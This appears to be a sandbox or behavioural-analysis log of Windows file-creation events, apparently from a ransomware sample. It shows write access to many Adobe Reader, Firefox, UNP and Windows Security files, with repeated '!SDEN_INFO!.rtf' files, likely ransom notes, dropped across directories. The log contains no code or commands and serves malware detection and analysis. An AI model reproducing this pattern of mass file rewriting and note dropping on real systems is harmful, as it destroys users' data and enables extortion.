| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\el-GR\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\hr-HR\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\features\followonsearch@mozilla.com.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\dependentlibs.list | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\nssdbm3.chk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\lv-LV\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\distribute_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\20170517_Lock_200.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\rempl\Logs\Remediation.002.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\da-DK\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Win10_Brand.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-PH\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInAcrobat.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-IE\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\uk-UA\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-ES\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.006.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-FR\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_ie8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ko-KR\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nn-NO\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\MoreTools.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
